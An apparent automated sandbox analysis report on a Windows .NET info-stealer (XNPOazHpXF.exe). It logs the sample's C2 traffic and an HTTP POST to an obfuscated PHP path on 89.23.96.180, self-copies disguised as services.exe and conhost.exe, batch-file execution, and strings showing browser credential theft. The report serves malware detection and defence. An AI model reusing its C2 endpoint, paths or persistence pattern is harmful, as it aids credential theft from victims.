                              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.96.180
                              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.96.180
                              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.96.180
                              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.96.180
                              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.96.180
                              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.96.180
                              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.96.180
                              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.96.180
                              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.96.180
                              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.96.180
                              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.96.180
                              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.96.180
                              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.96.180
                              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.96.180
                              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.96.180
                              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.96.180
                              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.96.180
                              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.96.180
                              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.96.180
                              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.96.180
                              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.96.180
                              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.96.180
                              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.96.180
                              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.96.180
                              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.96.180
                              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.96.180
                              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.96.180
                              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.96.180
                              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.96.180
                              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.96.180
                              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.96.180
                              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.96.180
                              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.96.180
                              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.96.180
                              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.96.180
                              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.96.180
                              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.96.180
                              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.96.180
                              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.96.180
                              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.96.180
                              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.96.180
                              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.96.180
                              Source: unknownHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 89.23.96.180Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                              Source: services.exe, 00000007.00000002.3303823064.000000000391B000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3303823064.000000000358C000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3303823064.00000000035C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.23.96.180
                              Source: services.exe, 00000007.00000002.3303823064.00000000032FB000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3303823064.000000000391B000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3303823064.000000000358C000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3303823064.00000000035C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.23.96.180/03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlon
                              Source: XNPOazHpXF.exe, 00000000.00000002.2113796055.00000000040B7000.00000004.00000800.00020000.00000000.sdmp, XNPOazHpXF.exe, 00000000.00000002.2113796055.0000000003D43000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3303823064.00000000032FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                              Source: services.exe, 00000007.00000002.3323064532.0000000014335000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3323064532.0000000013A1D000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3323064532.0000000014A24000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3323064532.00000000142DD000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3323064532.0000000014371000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3323064532.00000000132EE000.00000004.00000800.00020000.00000000.sdmp, fC7n25oOth.7.dr, HslgI8GFKy.7.dr, 7lGrZZTg6P.7.dr, YKVdl3qRW3.7.dr, qrCXgKFeXX.7.dr, Me1sywPqWl.7.dr, zYDXjqUiwz.7.dr, 9pJalsOZnX.7.dr, C5HACCzIP7.7.dr, Aad1KyMxEJ.7.dr, FcHVbMX2xg.7.dr, q3ruztWTol.7.dr, pkOvVXzdYG.7.dr, iW5lf7oEU7.7.dr, dSWTN6jEWv.7.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                              Source: services.exe, 00000007.00000002.3323064532.0000000014335000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3323064532.0000000013A1D000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3323064532.0000000014A24000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3323064532.00000000142DD000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3323064532.0000000014371000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3323064532.00000000132EE000.00000004.00000800.00020000.00000000.sdmp, fC7n25oOth.7.dr, HslgI8GFKy.7.dr, 7lGrZZTg6P.7.dr, YKVdl3qRW3.7.dr, qrCXgKFeXX.7.dr, Me1sywPqWl.7.dr, zYDXjqUiwz.7.dr, 9pJalsOZnX.7.dr, C5HACCzIP7.7.dr, Aad1KyMxEJ.7.dr, FcHVbMX2xg.7.dr, q3ruztWTol.7.dr, pkOvVXzdYG.7.dr, iW5lf7oEU7.7.dr, dSWTN6jEWv.7.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                              Source: services.exe, 00000007.00000002.3323064532.0000000014335000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3323064532.0000000013A1D000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3323064532.0000000014A24000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3323064532.00000000142DD000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3323064532.0000000014371000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3323064532.00000000132EE000.00000004.00000800.00020000.00000000.sdmp, fC7n25oOth.7.dr, HslgI8GFKy.7.dr, 7lGrZZTg6P.7.dr, YKVdl3qRW3.7.dr, qrCXgKFeXX.7.dr, Me1sywPqWl.7.dr, zYDXjqUiwz.7.dr, 9pJalsOZnX.7.dr, C5HACCzIP7.7.dr, Aad1KyMxEJ.7.dr, FcHVbMX2xg.7.dr, q3ruztWTol.7.dr, pkOvVXzdYG.7.dr, iW5lf7oEU7.7.dr, dSWTN6jEWv.7.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                              Source: services.exe, 00000007.00000002.3323064532.0000000014335000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3323064532.0000000013A1D000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3323064532.0000000014A24000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3323064532.00000000142DD000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3323064532.0000000014371000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3323064532.00000000132EE000.00000004.00000800.00020000.00000000.sdmp, fC7n25oOth.7.dr, HslgI8GFKy.7.dr, 7lGrZZTg6P.7.dr, YKVdl3qRW3.7.dr, qrCXgKFeXX.7.dr, Me1sywPqWl.7.dr, zYDXjqUiwz.7.dr, 9pJalsOZnX.7.dr, C5HACCzIP7.7.dr, Aad1KyMxEJ.7.dr, FcHVbMX2xg.7.dr, q3ruztWTol.7.dr, pkOvVXzdYG.7.dr, iW5lf7oEU7.7.dr, dSWTN6jEWv.7.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                              Source: services.exe, 00000007.00000002.3323064532.0000000014335000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3323064532.0000000013A1D000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3323064532.0000000014A24000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3323064532.00000000142DD000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3323064532.0000000014371000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3323064532.00000000132EE000.00000004.00000800.00020000.00000000.sdmp, fC7n25oOth.7.dr, HslgI8GFKy.7.dr, 7lGrZZTg6P.7.dr, YKVdl3qRW3.7.dr, qrCXgKFeXX.7.dr, Me1sywPqWl.7.dr, zYDXjqUiwz.7.dr, 9pJalsOZnX.7.dr, C5HACCzIP7.7.dr, Aad1KyMxEJ.7.dr, FcHVbMX2xg.7.dr, q3ruztWTol.7.dr, pkOvVXzdYG.7.dr, iW5lf7oEU7.7.dr, dSWTN6jEWv.7.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                              Source: services.exe, 00000007.00000002.3323064532.0000000014335000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3323064532.0000000013A1D000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3323064532.0000000014A24000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3323064532.00000000142DD000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3323064532.0000000014371000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3323064532.00000000132EE000.00000004.00000800.00020000.00000000.sdmp, fC7n25oOth.7.dr, HslgI8GFKy.7.dr, 7lGrZZTg6P.7.dr, YKVdl3qRW3.7.dr, qrCXgKFeXX.7.dr, Me1sywPqWl.7.dr, zYDXjqUiwz.7.dr, 9pJalsOZnX.7.dr, C5HACCzIP7.7.dr, Aad1KyMxEJ.7.dr, FcHVbMX2xg.7.dr, q3ruztWTol.7.dr, pkOvVXzdYG.7.dr, iW5lf7oEU7.7.dr, dSWTN6jEWv.7.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                              Source: services.exe, 00000007.00000002.3323064532.0000000014335000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3323064532.0000000013A1D000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3323064532.0000000014A24000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3323064532.00000000142DD000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3323064532.0000000014371000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3323064532.00000000132EE000.00000004.00000800.00020000.00000000.sdmp, fC7n25oOth.7.dr, HslgI8GFKy.7.dr, 7lGrZZTg6P.7.dr, YKVdl3qRW3.7.dr, qrCXgKFeXX.7.dr, Me1sywPqWl.7.dr, zYDXjqUiwz.7.dr, 9pJalsOZnX.7.dr, C5HACCzIP7.7.dr, Aad1KyMxEJ.7.dr, FcHVbMX2xg.7.dr, q3ruztWTol.7.dr, pkOvVXzdYG.7.dr, iW5lf7oEU7.7.dr, dSWTN6jEWv.7.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                              Source: services.exe, 00000007.00000002.3323064532.0000000014335000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3323064532.0000000013A1D000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3323064532.0000000014A24000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3323064532.00000000142DD000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3323064532.0000000014371000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3323064532.00000000132EE000.00000004.00000800.00020000.00000000.sdmp, fC7n25oOth.7.dr, HslgI8GFKy.7.dr, 7lGrZZTg6P.7.dr, YKVdl3qRW3.7.dr, qrCXgKFeXX.7.dr, Me1sywPqWl.7.dr, zYDXjqUiwz.7.dr, 9pJalsOZnX.7.dr, C5HACCzIP7.7.dr, Aad1KyMxEJ.7.dr, FcHVbMX2xg.7.dr, q3ruztWTol.7.dr, pkOvVXzdYG.7.dr, iW5lf7oEU7.7.dr, dSWTN6jEWv.7.drString found in binary or memory: https://www.ecosia.org/newtab/
                              Source: services.exe, 00000007.00000002.3323064532.0000000014335000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3323064532.0000000013A1D000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3323064532.0000000014A24000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3323064532.00000000142DD000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3323064532.0000000014371000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3323064532.00000000132EE000.00000004.00000800.00020000.00000000.sdmp, fC7n25oOth.7.dr, HslgI8GFKy.7.dr, 7lGrZZTg6P.7.dr, YKVdl3qRW3.7.dr, qrCXgKFeXX.7.dr, Me1sywPqWl.7.dr, zYDXjqUiwz.7.dr, 9pJalsOZnX.7.dr, C5HACCzIP7.7.dr, Aad1KyMxEJ.7.dr, FcHVbMX2xg.7.dr, q3ruztWTol.7.dr, pkOvVXzdYG.7.dr, iW5lf7oEU7.7.dr, dSWTN6jEWv.7.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                              Source: C:\Windows\InputMethod\CHT\services.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeProcess Stats: CPU usage > 49%
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeFile created: C:\Windows\InputMethod\CHT\services.exeJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeFile created: C:\Windows\InputMethod\CHT\services.exe\:Zone.Identifier:$DATAJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeFile created: C:\Windows\InputMethod\CHT\c5b4cb5e9653ccJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeCode function: 0_2_00007FF848F20D680_2_00007FF848F20D68
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeCode function: 0_2_00007FF8490C01210_2_00007FF8490C0121
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeCode function: 0_2_00007FF8490D49780_2_00007FF8490D4978
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeCode function: 0_2_00007FF8490D31F20_2_00007FF8490D31F2
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeCode function: 0_2_00007FF8490D3C710_2_00007FF8490D3C71
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeCode function: 0_2_00007FF8490D2CC80_2_00007FF8490D2CC8
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeCode function: 0_2_00007FF8490C5E550_2_00007FF8490C5E55
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeCode function: 0_2_00007FF8490D38F20_2_00007FF8490D38F2
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeCode function: 0_2_00007FF8496291F20_2_00007FF8496291F2
                              Source: C:\Windows\InputMethod\CHT\services.exeCode function: 7_2_00007FF848F40D687_2_00007FF848F40D68
                              Source: C:\Windows\InputMethod\CHT\services.exeCode function: 7_2_00007FF8490E01217_2_00007FF8490E0121
                              Source: C:\Windows\InputMethod\CHT\services.exeCode function: 7_2_00007FF8490F413D7_2_00007FF8490F413D
                              Source: C:\Windows\InputMethod\CHT\services.exeCode function: 7_2_00007FF8490F49787_2_00007FF8490F4978
                              Source: C:\Windows\InputMethod\CHT\services.exeCode function: 7_2_00007FF8490F31F27_2_00007FF8490F31F2
                              Source: C:\Windows\InputMethod\CHT\services.exeCode function: 7_2_00007FF8490F3C717_2_00007FF8490F3C71
                              Source: C:\Windows\InputMethod\CHT\services.exeCode function: 7_2_00007FF8490F2CC87_2_00007FF8490F2CC8
                              Source: C:\Windows\InputMethod\CHT\services.exeCode function: 7_2_00007FF8490E5E557_2_00007FF8490E5E55
                              Source: C:\Windows\InputMethod\CHT\services.exeCode function: 7_2_00007FF8490F38F27_2_00007FF8490F38F2
                              Source: C:\Windows\InputMethod\CHT\services.exeCode function: 7_2_00007FF849642B5F7_2_00007FF849642B5F
                              Source: C:\Windows\InputMethod\CHT\services.exeCode function: 7_2_00007FF8496491F27_2_00007FF8496491F2
                              Source: C:\Windows\InputMethod\CHT\services.exeCode function: 7_2_00007FF8498820EE7_2_00007FF8498820EE
                              Source: C:\Windows\InputMethod\CHT\services.exeCode function: 7_2_00007FF84999A35F7_2_00007FF84999A35F
                              Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\XNPOazHpXF.exe 3AC51E8FC3AA517AEA4640EFAFFA1B04301C14DC876104E09AB9B7A3A95A0415
                              Source: Joe Sandbox ViewDropped File: C:\ProgramData\OfJItdCHnFwJKGdVvarOLqclbfs.exe 3AC51E8FC3AA517AEA4640EFAFFA1B04301C14DC876104E09AB9B7A3A95A0415
                              Source: Joe Sandbox ViewDropped File: C:\Recovery\conhost.exe 3AC51E8FC3AA517AEA4640EFAFFA1B04301C14DC876104E09AB9B7A3A95A0415
                              Source: XNPOazHpXF.exe, 00000000.00000002.2112895255.00000000035E0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameBrowsersStealer_native.dll" vs XNPOazHpXF.exe
                              Source: XNPOazHpXF.exe, 00000000.00000002.2137909639.000000001C482000.00000002.00000001.01000000.00000000.sdmpBinary or memory string: OriginalFilenameq944h9VdeekiaLj6nIEA0nxdMfYwMGO54 vs XNPOazHpXF.exe
                              Source: XNPOazHpXF.exe, 00000000.00000002.2113796055.0000000003C5A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameq944h9VdeekiaLj6nIEA0nxdMfYwMGO54 vs XNPOazHpXF.exe
                              Source: XNPOazHpXF.exe, 00000000.00000002.2138292682.000000001C55E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs XNPOazHpXF.exe
                              Source: XNPOazHpXF.exe, 00000000.00000002.2138292682.000000001C55E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs XNPOazHpXF.exe
                              Source: XNPOazHpXF.exe, 00000000.00000002.2113796055.0000000003D43000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameq944h9VdeekiaLj6nIEA0nxdMfYwMGO54 vs XNPOazHpXF.exe
                              Source: XNPOazHpXF.exe, 00000000.00000000.2052729222.000000000136A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs XNPOazHpXF.exe
                              Source: XNPOazHpXF.exeBinary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs XNPOazHpXF.exe
                              Source: XNPOazHpXF.exe.0.drBinary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs XNPOazHpXF.exe
                              Source: XNPOazHpXF.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                              Source: XNPOazHpXF.exe, V3J8u8DnaoyJKINZVJe.csCryptographic APIs: 'CreateDecryptor'
                              Source: XNPOazHpXF.exe, V3J8u8DnaoyJKINZVJe.csCryptographic APIs: 'CreateDecryptor'
                              Source: XNPOazHpXF.exe, V3J8u8DnaoyJKINZVJe.csCryptographic APIs: 'CreateDecryptor'
                              Source: XNPOazHpXF.exe, V3J8u8DnaoyJKINZVJe.csCryptographic APIs: 'CreateDecryptor'
                              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@10/328@0/1
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeFile created: C:\Program Files (x86)\msbuild\Microsoft\Windows Workflow Foundation\XNPOazHpXF.exeJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeFile created: C:\Users\user\Desktop\iSjOnjPm.logJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeMutant created: NULL
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5160:120:WilError_03
                              Source: C:\Windows\InputMethod\CHT\services.exeMutant created: \Sessions\1\BaseNamedObjects\Local\886b964eacdf58df64ccd2e35a7cc93f02ef5b995bb1b61ec19d87c5f2d1fe93
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeFile created: C:\Users\user\AppData\Local\Temp\gMaI3scL3qJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\1kuSaYZZpb.bat"
                              Source: XNPOazHpXF.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: XNPOazHpXF.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                              Source: C:\Windows\InputMethod\CHT\services.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeFile read: C:\Users\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                              Source: YvzNsoyEQb.7.dr, GYf3drC0FR.7.dr, m4KQfQtFPN.7.dr, POMdelZe2b.7.dr, IcnjKoD0Lh.7.dr, uYJiYgNb6j.7.dr, rvLCnUuNlo.7.dr, nPehugfo5q.7.dr, SuXvooZmu4.7.dr, 8p1RTDi4Qy.7.dr, U81FF4HJ9V.7.dr, OOYqLzQk4O.7.dr, JBGbz5npNf.7.dr, 5YhimTCY2k.7.dr, xUNavh1wji.7.dr, ra622pRlHs.7.dr, 3fLy2dY8uz.7.dr, Ymk9XrXgQL.7.dr, wMmH2lN0Y0.7.dr, LSltcqAhDi.7.dr, k3f0A2iAbM.7.dr, TQWrx8xby1.7.dr, kPvWKE024o.7.dr, k9BjmfARoD.7.dr, EySRZreafR.7.dr, h9FpCLu2Po.7.dr, 1LI40zC358.7.dr, gZJnkVSxDP.7.dr, oouO199VyA.7.dr, 2qHAeASJN9.7.dr, fBARfbLGPb.7.dr, c48Xb5A3EC.7.dr, nKvJJIyKKr.7.dr, 1xdpuai86K.7.dr, mYxPBk3luR.7.dr, WC64vTPHCK.7.dr, dGVqJLlM1n.7.dr, eL5pu6QxuA.7.dr, qfl5sTclEy.7.dr, Xg6OaNTVme.7.dr, 3bnSqGW5R7.7.dr, T34drojELq.7.dr, ZoWvXAfQI6.7.dr, LoDq9I1lAR.7.dr, ohPvh55mXf.7.dr, MIYBhrCUgm.7.dr, OHGJaKbV9E.7.dr, TJ17Vq0de4.7.dr, qfNzwgbTxb.7.dr, IqLvrobSmA.7.dr, ExQFCtUh7Q.7.dr, k2gOj7OrPh.7.dr, hT2weFkL3Q.7.dr, j9aTZ35Zq4.7.dr, qLqjY5X4dY.7.dr, MeRziK92q4.7.dr, iL7NxY1Htx.7.dr, KkX79GAGRf.7.dr, VBJ1Nyh6PB.7.dr, ku6LiiuD7i.7.dr, 4BiZY3BNMa.7.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                              Source: XNPOazHpXF.exeReversingLabs: Detection: 73%
                              Source: XNPOazHpXF.exeVirustotal: Detection: 60%
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeFile read: C:\Users\user\Desktop\XNPOazHpXF.exeJump to behavior
                              Source: unknownProcess created: C:\Users\user\Desktop\XNPOazHpXF.exe "C:\Users\user\Desktop\XNPOazHpXF.exe"
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\1kuSaYZZpb.bat"
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\InputMethod\CHT\services.exe "C:\Windows\InputMethod\CHT\services.exe"
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\1kuSaYZZpb.bat" Jump to behavior
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhostJump to behavior
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\InputMethod\CHT\services.exe "C:\Windows\InputMethod\CHT\services.exe" Jump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeSection loaded: ktmw32.dllJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeSection loaded: dlnashext.dllJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeSection loaded: wpdshext.dllJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeSection loaded: wintypes.dllJump to behavior
